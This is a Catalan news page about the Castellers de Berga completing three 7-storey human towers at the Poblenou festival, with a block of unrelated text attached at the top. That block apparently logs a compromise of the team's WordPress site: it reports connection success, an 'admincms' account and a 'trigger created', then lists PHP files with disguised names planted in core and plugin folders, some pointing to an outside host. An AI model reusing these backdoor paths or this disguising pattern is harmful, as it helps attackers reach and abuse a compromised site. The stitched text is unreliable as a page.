Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax-response https://castellersdeberga.cat/wp-admin/media-new-ajax-stream-ajax-response-ajax-core-cron.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/list-table-private-cron-core-stream.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-pclzip-stream-meta-cron.php https://castellersdeberga.cat/wp-content/plugins/js_composer/vc_classmap.json-ajax-private-private-stream-ajax-core.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/about-redsys-ajax-core-stream-wp-ajax-ajax-cron-private-ajax.php https://castellersdeberga.cat/wp-includes/pluggable-ajax-response-ajax-response-ajax-response-ajax-response.php https://castellersdeberga.cat/wp-includes/class-wp-object-cache-meta-ajax-response-stream-meta-cron-ajax-cron.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | 3 castells de 7 al Poblenou
 

3 castells de 7 al Poblenou


3 castells de 7 al PoblenouTres dies després de l’actuació a la V, a l’11 de setembre, els Castellers de Berga es van tornar a desplaçar a Barcelona, aquesta vegada a la Festa Major del Poblenou. Al Parc del Centre, hi van completar una magnífica actuació descarregant tres castells de 7 pisos: el 3, el 4 i el 4 de 7 amb l’agulla. 

Els berguedans van actuar conjuntament amb els Castellers de Barcelona i els Castellers de la Vila de Gràcia. Els graciencs van descarregar el 2 de 8 amb folre, el 3 de 9 amb folre i el 4 de 8 amb l’agulla. Els Castellers de Barcelona van completar el 3 i el 4 de 8, un intent de 9 de 7 i van descarregar el 4 de 8 amb l’agulla. Les dues colles barcelonines van actuar amb la vista posada a la Mercè.
Com a curiositat, és la primera vegada que, un poc més de 2 anys, Castellers de Berga coincideix amb una colla que també va vestida de blau, Castellers de la Vila de Gràcia.
Els berguedans encaren dues setmanes de preparació del Concurs de Castells, el diumenge 28 de setembre a Torrredembarra. Abans, el dissabte 20 de setembre a les 5 de la tarda, faran un taller en el marc de la Festa Major de l’Ametlla de Merola. Els assajos continuen els dimarts i divendres al vespre al Teatre de Cal Rosal.